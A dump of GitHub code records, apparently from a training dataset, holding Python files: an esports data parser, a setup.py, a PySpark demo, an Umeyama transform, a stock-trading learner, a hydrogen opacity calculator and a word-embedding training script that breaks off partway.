IDs\nfor game_id in game_ids:\n print(game_id)\n\n# The JSON data\ndata = json.load(open(\"../esports-data/mapping_data.json\", \"r\", encoding=\"utf-8\"))\n\n# Directory containing the nested folders with game files\n\n\n# Extract platformGameId values and convert them to expected filename format\nexpected_files = [entry['platformGameId'].replace(':', '_') + '.json' for entry in data]\n\n\n'''\ncollection = db[\"game_files\"]\ndata = json.load(open(\"../esports-data/mapping_data.json\", \"r\", encoding=\"utf-8\"))\ncompleted_games_collection = db[\"completed_games\"]\nroot_directory = \"../games_data\" # Replace this with the path to your directory\nexpected_files = [entry['platformGameId'].replace(':', '_') + '.json' for entry in data]\n\n\ndef get_tournament_name(game_id):\n games = completed_games_collection.find({})\n for entry in games:\n if entry['id'] == game_id:\n return entry['tournament_name']\n\n\ndef process_game_file(filepath):\n # create a temp json in memory\n temp = {\"events\": [], \"id\": \"\", \"tournament_name\": \"\"}\n game_events = json.load(open(filepath, \"r\", encoding=\"utf-8\"))\n second = 0\n gameEnd = False\n for event in game_events:\n if event.get(\"eventType\") != \"stats_update\":\n gameEnd = event.get(\"gameOver\")\n temp.get(\"events\").append(event)\n else:\n second += 1\n if second % 60 == 0:\n temp.get(\"events\").append(event)\n if gameEnd:\n print(\"game end\")\n temp.get(\"events\").append(event)\n\n return temp\n\n\ngame_files_collection = db[\"game_files\"]\ngame_files = game_files_collection.find({})\ncount = 0\n# Traverse the directory to find and read the matching game files\nfor subdir, _, files in os.walk(root_directory):\n for i, file in enumerate(files):\n if file in expected_files:\n filepath = os.path.join(subdir, file)\n filepath = filepath[-26:-5].replace(\"_\", \":\") # Remove the \"../games_data\" prefix\n\n times = time.time()\n\n for entry in data:\n if entry['platformGameId'] == filepath:\n esports_game_id = entry['esportsGameId']\n print(f\"Found matching game file: {filepath} (esportsGameId: {esports_game_id})\")\n print(f\"Finding matching game file took: {time.time() - times}\")\n times = time.time()\n # Check if the specific ID exists in the collection\n\n result = game_files_collection.find_one({'id': esports_game_id}, {'_id': 1}) is not None\n print(f\"Finding matching game file from collection took: {time.time() - times}\")\n times = time.time()\n\n if result:\n count = count + 1\n if count % 10 == 0:\n print(f\"count: {count} Game file with ID {esports_game_id} already exists. Skipping...\")\n break\n jsons = process_game_file(os.path.join(subdir, file))\n print(f\"Processing game file took: {time.time() - times}\")\n times = time.time()\n jsons[\"id\"] = esports_game_id\n jsons[\"tournament_name\"] = get_tournament_name(esports_game_id)\n collection.update_one({\"id\": esports_game_id}, {\"$set\": jsons}, upsert=True)\n print(f\"Inserting game file took: {time.time() - times}\")\n times = time.time()\n print(f\"Processing file {i + 1} of {len(files)}: {filepath}\")\n\n\nprint(\"Insertion of matching game files complete.\")\n\nclient.close()\n","repo_name":"haoyanwan/GlobalPowers","sub_path":"src/database/parse_data.py","file_name":"parse_data.py","file_ext":"py","file_size_in_byte":7674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29559495880","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nfrom notiondict import __version__\n\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nrequirements = [\n 'readmdict',\n 'requests',\n 'docopt',\n 'pyclip',\n 'PyYAML'\n\n]\n\nsetup(\n name='notiondict',\n version=__version__,\n description='A high customized dictionary',\n long_description=readme,\n author='Pixelhegel',\n author_email='Pixelhegel@gmail.com',\n url='https://github.com/pixelhegel/notiondict',\n packages=[\n 'notiondict',\n ],\n package_dir={'notiondict':\n 'notiondict'},\n include_package_data=True,\n package_data={'': ['config.yml','get_active_window_title_macos.scpt']},\n install_requires=requirements,\n license='Apache License',\n zip_safe=False,\n keywords='dictionary notification tool',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n ],\n test_suite='tests',\n entry_points={\n 'console_scripts': [\n 'notiondict=notiondict.notiondict:main',\n ],\n },\n)","repo_name":"PixelHegel/NotionDict","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8302058620","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, max, when\n\n# Initialize Spark session\nspark = SparkSession.builder.appName(\"RawInterfaceProcessing\").getOrCreate()\n\n# Sample data for validated_records\nvalidated_records_data = [\n (1, \"cis1\", \"entity1\", \"model1\", \"v1\", \"seg1\", \"grade1\", 0.2, \"Y\", \"Country1\", \"2023-01-01\"),\n (2, \"cis2\", \"entity2\", \"model2\", \"v2\", \"seg2\", \"grade2\", 0.3, \"N\", \"Country2\", \"2023-01-02\"),\n # Add more data as needed\n]\n\n# Sample data for raw_interface\nraw_interface_data = [\n (\"01-01-2023\", \"cp1\", \"postcrm1\", \"precrm1\", \"col1\", \"col2\"),\n (\"01-02-2023\", \"cp2\", \"postcrm2\", \"precrm2\", \"col1\", \"col2\"),\n # Add 5 more records\n (\"01-0-2023\", \"cp3\", \"postcrm3\", \"precrm3\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cp4\", \"postcrm4\", \"precrm4\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cp5\", \"postcrm5\", \"precrm5\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cis1\", \"postcrm6\", \"precrm6\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cis2\", \"postcrm7\", \"precrm7\", \"col1\", \"col2\"),\n]\n\n# Create DataFrames\nvalidated_records_df = spark.createDataFrame(validated_records_data, [\"sl_no\", \"cis_code\", \"entity_name\", \"model_name\", \"model_version\", \"segment\", \"definitive_grade\", \"definitive_pd\", \"cascade_flag\", \"country_of_operations\", \"last_grading_date\"])\nraw_interface_df = spark.createDataFrame(raw_interface_data, [\"day_rk\", \"counterparty_id\", \"pd_score_postcrm\", \"pd_score_precrm\", \"col1\", \"col2\"])\n\n\n\n# 1. Copy raw_interface to \"raw_interface_new\" temp dataframe\nraw_interface_new_df = raw_interface_df\n\n# 2. Print total number of records in \"raw_interface_new\"\nprint(f'Total no of records in \"raw_interface_new\" now: {raw_interface_new_df.count()}')\n\n# 3. Get max_day = max(day_rk) and display max day_rk\nmax_day = raw_interface_new_df.select(max(col(\"day_rk\"))).first()[0]\nprint(f'Max day_rk is: {max_day}')\n\n# 4. Create \"raw_interface_new_max_day_rk_data\" from \"raw_interface_new\" where day_rk = max_day\nraw_interface_new_max_day_rk_data = raw_interface_new_df.filter(col(\"day_rk\") == max_day)\n\n# 5. Print total number of records in \"raw_interface_new_max_day_rk_data\"\nprint(f'Total no of records in \"raw_interface_new_max_day_rk_data\": {raw_interface_new_max_day_rk_data.count()}')\n\n# 6. Create \"raw_interface_new_non_max_day_rk_data\" from \"raw_interface_new\" where day_rk not equal max_day\nraw_interface_new_non_max_day_rk_data = raw_interface_new_df.filter(col(\"day_rk\") != max_day)\n\n# 7. Print total number of records in \"raw_interface_new_non_max_day_rk_data\"\nprint(f'Total no of records in \"raw_interface_new_non_max_day_rk_data\": {raw_interface_new_non_max_day_rk_data.count()}')\n\n# 8. Display raw_interface_new_max_day_rk_data and raw_interface_new_non_max_day_rk_data records\nprint(\"Records in raw_interface_new_non_max_day_rk_data:\")\nraw_interface_new_non_max_day_rk_data.show(truncate=False)\n\n\n# Display validated_records records\nprint(\"Records in validated_records:\")\nvalidated_records_df.show(truncate=False)\nprint(\"Records in raw_interface_new_max_day_rk_data:\")\nraw_interface_new_max_day_rk_data.show(truncate=False)\n\n# Join the dataframes to get the necessary columns\njoined_df = raw_interface_new_max_day_rk_data.join(\n validated_records_df.select(\"cis_code\", \"definitive_pd\"),\n col(\"counterparty_id\") == col(\"cis_code\"),\n \"left_outer\"\n)\n\njoined_df.show(truncate=False)\n# Update the columns based on the condition\nupdated_raw_interface = joined_df.withColumn(\n \"pd_score_postcrm\", when(col(\"cis_code\").isNotNull(), col(\"definitive_pd\")).otherwise(col(\"pd_score_postcrm\"))\n).withColumn(\n \"pd_score_precrm\", when(col(\"cis_code\").isNotNull(), col(\"definitive_pd\")).otherwise(col(\"pd_score_precrm\"))\n).drop(\"cis_code\", \"definitive_pd\")\n\n# Display updated records\nupdated_raw_interface.show(truncate=False)\n\n# Stop Spark session\nspark.stop()\n","repo_name":"kasaram/d1","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13376049521","text":"import numpy as np\n\n\ndef umeyama(src, dst, estimate_scale):\n \"\"\"Estimate N-D similarity transformation with or without scaling.\n Parameters\n ----------\n src : (M, N) array\n Source coordinates.\n dst : (M, N) array\n Destination coordinates.\n estimate_scale : bool\n Whether to estimate scaling factor.\n Returns\n -------\n T : (N + 1, N + 1)\n The homogeneous similarity transformation matrix. The matrix contains\n NaN values only if the problem is not well-conditioned.\n References\n ----------\n .. [1] \"Least-squares estimation of transformation parameters between two\n point patterns\", Shinji Umeyama, PAMI 1991, DOI: 10.1109/34.88573\n \"\"\"\n\n num = src.shape[0]\n dim = src.shape[1]\n\n # Compute mean of src and dst.\n src_mean = src.mean(axis=0)\n dst_mean = dst.mean(axis=0)\n\n # Subtract mean from src and dst.\n src_demean = src - src_mean\n dst_demean = dst - dst_mean\n\n # Eq. (38).\n A = np.dot(dst_demean.T, src_demean) / num\n\n # Eq. (39).\n d = np.ones((dim,), dtype=np.double)\n if np.linalg.det(A) < 0:\n d[dim - 1] = -1\n\n T = np.eye(dim + 1, dtype=np.double)\n\n U, S, V = np.linalg.svd(A)\n\n # Eq. (40) and (43).\n rank = np.linalg.matrix_rank(A)\n if rank == 0:\n return np.nan * T\n elif rank == dim - 1:\n if np.linalg.det(U) * np.linalg.det(V) > 0:\n T[:dim, :dim] = np.dot(U, V)\n else:\n s = d[dim - 1]\n d[dim - 1] = -1\n T[:dim, :dim] = np.dot(U, np.dot(np.diag(d), V))\n d[dim - 1] = s\n else:\n T[:dim, :dim] = np.dot(U, np.dot(np.diag(d), V.T))\n\n if estimate_scale:\n # Eq. (41) and (42).\n scale = 1.0 / src_demean.var(axis=0).sum() * np.dot(S, d)\n else:\n scale = 1.0\n\n # the python umeyama get a wrong rotation in some unknow condition\n # so we compare the two results and choose the minimum\n # it will be fixed in the future\n homo_src = np.insert(src, 3, 1, axis=1).T\n rot = T[:dim, :dim]\n\n rots = []\n losses = []\n for i in range(2):\n if i == 1:\n rot[:, :2] *= -1\n transform = np.eye(dim + 1, dtype=np.double)\n transform[:dim, :dim] = rot * scale\n transform[:dim, dim] \\\n = dst_mean - scale * np.dot(T[:dim, :dim], src_mean.T)\n transed = np.dot(transform, homo_src).T[:, :3]\n loss = np.linalg.norm(transed - dst)\n losses.append(loss)\n rots.append(rot.copy())\n # T[:dim, dim] = dst_mean - scale * np.dot(T[:dim, :dim], src_mean.T)\n # T[:dim, :dim] *= scale\n # print(T)\n\n # since only the smpl parameters is needed,\n # we return rotation, translation and scale\n trans = dst_mean - scale * np.dot(T[:dim, :dim], src_mean.T)\n if losses[0] > losses[1]:\n rot = rots[1]\n else:\n rot = rots[0]\n\n return rot, trans, scale\n","repo_name":"sail-sg/mvp","sub_path":"lib/smpl/umeyama.py","file_name":"umeyama.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":296,"dataset":"github-code","pt":"21"} +{"seq_id":"43497456415","text":"\"\"\"\nTemplate for implementing StrategyLearner (c) 2016 Tucker Balch\n\"\"\"\n\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nimport util as ut\nimport random\nimport math\nimport marketsimcode\nfrom math import floor\nfrom sklearn import ensemble\nimport matplotlib.pyplot as plt\n\n\nclass SingleStockAnalysis(object):\n def author(self):\n return \"msaqib3\"\n\n # constructor\n def __init__(self, verbose=False, impact=0.0, ybuy=0.00, rfThresh=0.1):\n '''\n verbose\n impact: how much impact does trade have\n ybuy: threshold for buying (and conversely negative for shorting) (generates Y)\n rfThresh: threshold to go all out\n '''\n self.verbose = verbose\n self.impact = impact\n self.ybuy = ybuy\n self.drLearner = ensemble.RandomForestRegressor(150)\n self.volLearner = ensemble.RandomForestRegressor(150)\n self.rfThresh = rfThresh\n\n # this method should create a RTLearner, and train it for trading\n def addEvidence(self, symbol=\"IBM\",\n sd=dt.datetime(2008, 1, 1),\n ed=dt.datetime(2009, 1, 1),\n sv=10000):\n # add your code to do learning here\n\n # example usage of the old backward compatible util function\n syms = [symbol]\n dates = pd.date_range(sd, ed)\n prices_all = ut.get_data(syms, dates) # automatically adds SPY\n prices = prices_all[syms] # only portfolio symbols\n if self.verbose: print(prices)\n\n # example use with new colname\n volume_all = ut.get_data(syms, dates, colname=\"Volume\") # automatically adds SPY\n volume = volume_all[symbol] # only portfolio symbols\n\n # generate some technical statistics on stock data\n high = ut.get_data(syms, dates, colname=\"High\", addSPY=False)[symbol]\n low = ut.get_data(syms, dates, colname=\"Low\", addSPY=False)[symbol]\n\n X, Y = self.genStats(prices[symbol], volume, high, low)\n # print(Y)\n\n self.drLearner.fit(X, Y)\n\n def genStats(self, price, volume, high, low):\n '''\n Generates X and Y for data\n '''\n # prices_all[\"Y\"] = Y\n changeVol = (volume.shift(1)) / volume.iloc[0]\n dr = (price.shift(-1)) / price - 1 # return for 1 day in future if you invested today\n\n # print \"dr\", dr.mean()\n dr = dr.fillna(method='ffill').fillna(method=\"bfill\")\n Y = dr * 100 # percentageReturn\n drChange = dr.shift(3) - dr.shift(2) #these are actually adj closed vals, so dr.shift(1) would still use adj close of curr day, leading to info leak\n momentum = (dr.shift(3) - dr.shift(2)) / dr.shift(2)\n momentum = momentum.fillna(method=\"ffill\").fillna(method=\"bfill\")\n intraDaySpread = (high.shift(1) - low.shift(1)) / price\n\n movingAverage = price.rolling(5).mean().fillna(method=\"ffill\").fillna(method=\"bfill\")\n movingStd = price.rolling(5).std().fillna(method=\"ffill\").fillna(method=\"bfill\")\n moving_z_score = (price - movingAverage) / movingStd\n movingVolStd = volume.rolling(5).std().fillna(method='ffill').fillna(method='bfill')\n X = pd.DataFrame([moving_z_score, movingStd, momentum, changeVol, movingVolStd, drChange, dr.shift(2), intraDaySpread])\n X = X.replace([np.inf, -np.inf], np.nan)\n X = X.fillna(method='ffill').fillna(method='bfill').values\n return X.T, Y\n\n # this method should use the existing policy and test it against new data\n def testPolicy(self, symbol=\"IBM\",\n sd=dt.datetime(2009, 1, 1),\n ed=dt.datetime(2010, 1, 1),\n sv=10000):\n dates = pd.date_range(sd, ed)\n prices_all = ut.get_data([symbol], dates) # automatically adds SPY\n volumes_all = ut.get_data([symbol], dates, colname=\"Volume\")\n high = ut.get_data([symbol], dates, colname=\"High\", addSPY=False)[symbol]\n low = ut.get_data([symbol], dates, colname=\"Low\", addSPY=False)[symbol]\n\n X, _ = self.genStats(prices_all[symbol], volumes_all[symbol], high, low)\n Ypred = self.drLearner.predict(X)\n Ypred = pd.Series(Ypred, index=prices_all.index)\n\n trades = pd.DataFrame(index=dates, columns=[symbol])\n\n trades.loc[trades.index[1:], symbol] = Ypred[1:].apply(\n lambda x: 1 if x > self.rfThresh else 0 if x < - self.rfThresh else np.nan) # position\n trades.loc[trades.index[-1], symbol] = 0 # we end at 0 shares\n trades.loc[trades.index[0], symbol] = 0 # we start at 0 shares\n trades = trades.fillna(method=\"ffill\").fillna(method=\"bfill\")\n trades[symbol] = - (trades.shift(\n 1) - trades) # subtract positions now by positions before to get change to portfolio (trades)\n trades[symbol].iloc[0] = 0\n trades = trades * 1\n return trades\n\n\nif __name__ == \"__main__\":\n print(\"One does not simply think up a strategy\")\n\n sl = SingleStockAnalysis()\n symbol = \"AAPL\"\n sd = dt.datetime(2009, 1, 1)\n md = dt.datetime(2012, 12, 29)\n ed = dt.datetime(2019, 4, 20)\n prices = ut.get_data([symbol], pd.date_range(md, ed))[symbol]\n sv = prices[md]\n sl.addEvidence(symbol=symbol, sd=sd, ed=md - dt.timedelta(days=1), sv=sv)\n # sl.addEvidence(symbol=symbol, sd=md, ed=ed, sv=sv)\n trades = sl.testPolicy(symbol=symbol, sd=md, ed=ed, sv=sv)\n results = (marketsimcode.compute_portvals(trades, commission=0, impact=0, start_val=sv)[1])\n plt.plot(results.index, results/results.iloc[0])\n plt.plot(prices.index, prices/prices.iloc[0])\n plt.legend([\"Learner\", \"Benchmark\"])\n plt.show()\n print(\"Strategy Percent Return {}\".format((results.iloc[-1]/sv - 1) * 100))\n print(\"Benchmark Percent Return {}\".format((prices.iloc[-1]/prices[0] - 1) * 100))\n","repo_name":"Saqibm128/ML4TradingStockTrader","sub_path":"server/StrategyLearner.py","file_name":"StrategyLearner.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17548947162","text":"# -*- encoding: utf-8 -*-\n\"\"\"\nPrograma para calcular la opacidad LTE de hidrógeno\n\nWilliam Henney - 06 Mar 2012\n\nCurso de Astrofísica Estelar - 2012-II - Tarea 03\n\"\"\"\n\nimport numpy as np\nfrom numpy import exp\n\n# \n# Constantes físicos\n#\n# # Unidades\n# # -------- \nBOLTZMANN_CGS = 1.3806503e-16 # erg/K\nEV_CGS = 1.602176462e-12 # erg/eV\nANGSTROM_CGS = 1.e-8 # cm\nLIGHTSPEED_CGS = 2.99792458e10 # cm/s\nPLANCK_CGS = 6.62606876e-27 # erg/s\nMASA_PROTON = 1.67262158e-24 # g\n\nBOLTZMANN = BOLTZMANN_CGS / EV_CGS # eV/K\nPLANCK = PLANCK_CGS / EV_CGS # eV/s\nRYDBERG = 13.6 # eV\nHMINUS_EION = 0.754 # eV\n\n# H0 función de partición (se supone constante)\nH0_U = 2.0\ndef H0_level_population(n, T):\n \"\"\"\n Calcular la población ETL del nivel n de hidrógeno neutro\n a una temperatura T kelvin\n \"\"\"\n # Energía de excitación respeto a n=1\n E = RYDBERG * (1.0 - 1.0/n**2)\n # Peso estadístico\n g = 2.0*n**2\n return (g/H0_U)*exp(-E/(BOLTZMANN*T))\n\ndef Saha_Phi(Eion, Ui, Un, T):\n \"\"\"\n Función Phi(T) = (Ni Ne / Nn) de Saha \n para energía de ionización Eion,\n y con funciones de partición Ui y Un\n \"\"\"\n return 4.8293744908e15 * (Ui/Un) * T**1.5 * exp(-Eion/(BOLTZMANN*T))\n\ndef Saha_Phi_H0Hplus(T):\n return Saha_Phi(RYDBERG, H0_U, H0_U, T)\n\ndef Saha_Phi_HminusH0(T):\n return Saha_Phi(HMINUS_EION, H0_U, 1.0, T)\n\n@np.vectorize\ndef Hplus_fraction(Hden, T):\n \"\"\"\n Calcular fracción de hidrógeno ionizado\n \"\"\"\n A = Saha_Phi_H0Hplus(T) / Hden\n # Resolver polinomio: y**2 + A*y - A = 0\n y = np.roots([1.0, A, -A])[1] # tomar raiz positivo\n return y\n\ndef Hminus_fraction(Hden, T):\n \"\"\"\n Calcular fracción del ión negativo de hidrógeno\n \"\"\" \n y = Hplus_fraction(Hden, T)\n return y * (1. - y) * Hden/Saha_Phi_HminusH0(T)\n\n\n\"\"\"\nSolving ion balance for hydrogen:\n\nn+ + n- + n0 = n\n(ne n+ / n0) = Phi1(T)\n(ne n0 / n-) = Phi2(T)\nne = n+ - n-\n\nAssume that n- abundance is always negligible\n\nThen ionized fraction y = n+/n obeys the quadratic equation\n\ny**2 + A*y - A = 0\n\nwhere A = Phi1(T)/n\n\"\"\"\n\n# Sección eficaz de n=1 de H0 a E = 1 Rydberg (Gray, Eq. 8.4)\n# (suponer factor gaunt = 1)\nXSEC0 = 7.92609446707e-18 # cm^2/H atom\n@np.vectorize\ndef xsec_H0_boundfree(n, nu):\n \"\"\"\n Sección eficaz de fotoionización de nivel n de H0 a frecuencia nu Hz\n\n Multiplicar por densidad de H0(n) para dar coeficiente de absorción (cm^{-1})\n \"\"\"\n E = PLANCK*nu # energía de fotón\n E0 = RYDBERG/n**2 # energía de ionización de nivel n\n\n if E >= E0:\n xsec = XSEC0*n*(E0/E)**3\n else:\n xsec = 0.0\n\n return xsec\n\ndef xsec_H0_freefree(T, nu):\n \"\"\"\n Sección eficaz por electrón de bremsstrahlung a frecuencia nu Hz\n\n Multiplicar por Ne N(H+) para dar coeficiente de absorción (cm^{-1})\n \"\"\"\n return 0.018 * T**-1.5 / nu**2 # Rybicki, eq. 5.19b\n\n@np.vectorize\ndef xsec_Hminus_boundfree(nu):\n \"\"\"\n Sección eficaz de fotoionización del ión negativo H- a frecuencia nu Hz\n\n Multiplicar por N(H-) para dar coeficiente de absorción (cm^{-1})\n \"\"\"\n wav = LIGHTSPEED_CGS / (nu * 1.e4 * ANGSTROM_CGS) # lambda en unidades de 10,000 Å (1 micron)\n # Fórmula y constantes de Gray, Eq. 8.11\n A = [1.99654, -1.18267e-1, 2.64243e2, -4.40524e2, 3.23992e2, -1.39568e2, 2.78701e1]\n xsec = 0.0\n # El ajuste es preciso para 2250 Å <= lambda <= 15,000 Å \n # Hay que cortarlo a partir de 16,200 Å porque el ajuste va negativo\n for i, a in enumerate(A):\n if wav <= 1.62:\n xsec += a*wav**i\n return xsec * 1.e-18\n\n@np.vectorize\ndef xsec_Hminus_freefree(T, nu):\n \"\"\"\n Opacidad libre-libre del ión negativo H- a frecuencia nu Hz\n\n Multiplicar por Pe N(H0) para dar coeficiente de absorción (cm^{-1})\n + Ojo que no hay que multiplicar por N(H-)\n + Y esto ya incluye la correción por emisión estimulada\n \"\"\"\n wav = LIGHTSPEED_CGS / (nu * ANGSTROM_CGS) # lambda en unidades de Å\n # if 2600.0 <= wav <= 113900.0:\n logwav = np.log10(wav)\n # Eq. 8.13 de Gray\n f0 = -2.2763 - 1.6850*logwav + 0.76661*logwav**2 - 0.053346*logwav**3\n f1 = 15.2827 - 9.2846*logwav + 1.99381*logwav**2 - 0.142631*logwav**3\n f2 = -197.789 + 190.266*logwav - 67.9775*logwav**2 + 10.6913*logwav**3 - 0.625151*logwav**4\n theta = np.log10(np.e) / (BOLTZMANN*T) # aproximadamente theta = 5040/T\n xsec = 1.e-26 * 10**(f0 + f1*np.log10(theta) + f2*np.log10(theta)**2)\n # else:\n # xsec = 0.0\n return xsec\n\n\ndef funcPe(Hden, T):\n \"\"\"\n Presión electrónica como función de densidad total y temperatura\n \"\"\"\n return Hden*Hplus_fraction(Hden, T)*BOLTZMANN_CGS*T\n\ndef funcHden(Pe, T):\n \"\"\"\n Densidad total como función de Pe y T\n\n Esta función busca numericamente el raiz para Hden de la función\n\n funcPe(Hden, T) - Pe = 0\n\n empezando con un primer intento que suponga 50% ionización\n \"\"\"\n from scipy.optimize import fsolve\n Hden0 = 0.5*Pe / (BOLTZMANN_CGS*T) # primer intento es 50% ionizado\n return fsolve(lambda Hden: funcPe(Hden, T) - Pe, Hden0)[0]\n\nNMAX = 20 # Nivel cuántico de H0 más alto para considerar\ndef opacidad_total(Hden, T, nu):\n \"\"\"\n Calcular la opacidad total del continuo de un gas de H puro en ETL\n\n Parámetros de entrada:\n \n Hden : densidad total de hidrógeno (cm^{-3})\n T : temperatura (K)\n nu : frecuencia (Hz)\n\n Resultado: \n\n opacities: dict con coeficiente de absorción por masa (cm^2/g)\n elementos son \"Total\", \"H0bf\", \"H0ff\", \"Hmbf\", \"Hmff\"\n \"\"\"\n\n y = Hplus_fraction(Hden, T) # fracción de ionización\n Hpden = y*Hden # densidad de H+\n eden = y*Hden # densidad de electrones\n Pe = funcPe(Hden, T) # presión de electrones\n H0den = (1.0 - y)*Hden # densidad de H0\n Hmden = Hden*Hminus_fraction(Hden, T) # densidad de H-\n\n stimulated_correction = (1.0 - np.exp(-PLANCK_CGS*nu / (BOLTZMANN_CGS*T)))\n opacities = dict()\n \n # H0 ligado-libre\n opacities[\"H0bf\"] = 0.0\n for n in range(1, NMAX+1):\n opacities[\"H0bf\"] += H0den * H0_level_population(n, T) * xsec_H0_boundfree(n, nu)\n opacities[\"H0bf\"] *= stimulated_correction\n # H0 libre-libre\n opacities[\"H0ff\"] = Hpden * eden * xsec_H0_freefree(T, nu)\n opacities[\"H0ff\"] *= stimulated_correction\n # H- ligado-libre\n opacities[\"Hmbf\"] = Hmden * xsec_Hminus_boundfree(nu)\n opacities[\"Hmbf\"] *= stimulated_correction \n # H- libre-libre (que ya incluye emisión estimulada)\n opacities[\"Hmff\"] = H0den * Pe * xsec_Hminus_freefree(T, nu)\n\n # convertir a opacidad por masa\n total = 0.0\n for k in opacities.keys():\n opacities[k] /= Hden*MASA_PROTON\n total += opacities[k]\n opacities[\"Total\"] = total\n return opacities\n","repo_name":"will-henney/lte-opacities","sub_path":"lteopacity.py","file_name":"lteopacity.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33766897981","text":"from app.ecommerce.address.repository.address_repository import (\n AddressRepository\n)\nfrom app.core.error.response import (\n ResponseFailure,\n ResponseTypes,\n build_response_from_invalid_request\n)\n\nrepository = AddressRepository()\n\n\ndef address_create_use_case(req):\n \n if not req:\n return build_response_from_invalid_request(invalid_request=req)\n try:\n return repository.create_address(data=req.data)\n \n except Exception as exec:\n return ResponseFailure(ResponseTypes.SYSTEM_ERROR, exec)\n","repo_name":"RxMobile-Dummy/python-ecommerce-clean-architecture","sub_path":"app/ecommerce/address/use_cases/address_create_use_case.py","file_name":"address_create_use_case.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25942242126","text":"#!/usr/bin/env python3\n\"\"\"Sample script of word embedding model.\n\nThis module implements skip-gram model and continuous-bow model.\n\n\"\"\"\nimport argparse\nimport chainer\nfrom chainer import cuda\nimport chainer.functions as F\nimport chainer.links as L\nfrom timeit import default_timer as timer\nfrom chainer import training\nfrom chainer.training import extensions\nimport logging\nimport os\nimport vecto\nfrom pathlib import Path\nfrom vecto.embeddings.dense import WordEmbeddingsDense\nfrom vecto.vocabulary import Vocabulary\nfrom vecto.vocabulary.vocabulary import create_from_path, create_ngram_tokens_from_dir, create_from_annotated_dir\nfrom vecto.embeddings import utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', '-g', default=-1, type=int,\n help='GPU ID (negative value indicates CPU)')\n parser.add_argument('--dimensions', '-d', default=100, type=int,\n help='number of dimensions')\n parser.add_argument('--context_type', '-ct', choices=['linear', 'deps'],\n default='linear',\n help='context type, for deps context, the annotated corpus is required')\n parser.add_argument('--context_representation', '-cp', choices=['word', 'deps', 'pos', 'posit', 'lr'],\n # todo lr posit, interation for deps\n default='word',\n help='context representation, for deps (dependency information) and ne (named entity), '\n 'the annotated corpus is required')\n parser.add_argument('--window', '-w', default=2, type=int,\n help='window size')\n parser.add_argument('--batchsize', '-b', type=int, default=1000,\n help='learning minibatch size')\n parser.add_argument('--epoch', '-e', default=1, type=int,\n help='number of epochs to learn')\n parser.add_argument('--model', '-m', choices=['skipgram', 'cbow'],\n default='skipgram', help='model type (\"skipgram\", \"cbow\")')\n parser.add_argument('--language', '-lang', choices=['eng', 'jap'],\n default='eng', help='the language, current only support english and japanese')\n parser.add_argument('--subword', '-sw',\n choices=['none', '_none', 'cnn1d', 'cnn1d_small', 'lstm', 'lstm_sum', 'bilstm', 'bilstm_sum',\n 'avg', 'sum'],\n default='none',\n help='specify if subword-level approach should be used ')\n parser.add_argument('--negative-size', default=5, type=int,\n help='number of negative samples')\n parser.add_argument('--min_gram', default=1, type=int,\n help='the min number of ngram size')\n parser.add_argument('--max_gram', default=5, type=int,\n help='the max number of ngram size')\n parser.add_argument('--out_type', '-o', choices=['hsm', 'ns', 'original'],\n default='ns',\n help='output model type (\"hsm\": hierarchical softmax, '\n '\"ns\": negative sampling, \"original\": no approximation)')\n parser.add_argument('--path_vocab',\n default='',\n help='path to the vocabulary', required=False)\n parser.add_argument('--path_word2chars',\n default='', help='path to the word2chars file, this is only used for japanese bushus',\n required=False)\n parser.add_argument('--path_vocab_ngram_tokens',\n default='',\n help='path to the vocabulary of ngram tokens (used for subword models)', required=False)\n parser.add_argument('--path_corpus', help='path to the corpus', required=True)\n parser.add_argument('--path_out', help='path to save embeddings', required=True)\n parser.add_argument('--test', dest='test', default=False, action='store_true')\n parser.add_argument('--verbose', default=False, help='verbose mode', action='store_true', required=False)\n\n args = parser.parse_args()\n return args\n\n\ndef print_params(args):\n print('GPU: {}'.format(args.gpu))\n print('dimensions: {}'.format(args.dimensions))\n print('Window: {}'.format(args.window))\n print('Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('Training model: {}'.format(args.model))\n print('Output type: {}'.format(args.out_type))\n print('')\n\n\ndef get_word2chars(path):\n word2chars = {}\n with open(path, 'r') as input_file:\n for line in input_file.readlines():\n tokens = line.split()\n word2chars[tokens[0]] = tokens[1]\n return word2chars\n\n\nclass SoftmaxCrossEntropyLoss(chainer.Chain):\n\n def __init__(self, n_in, n_out):\n super(SoftmaxCrossEntropyLoss, self).__init__()\n with self.init_scope():\n self.out = L.Linear(n_in, n_out, initialW=0)\n\n def __call__(self, x, t):\n return F.softmax_cross_entropy(self.out(x), t)\n\n\ndef get_loss_func(args, vocab_context):\n word_counts = vocab_context.lst_frequencies\n if args.out_type == 'hsm':\n HSM = L.BinaryHierarchicalSoftmax\n d_counts = {i: 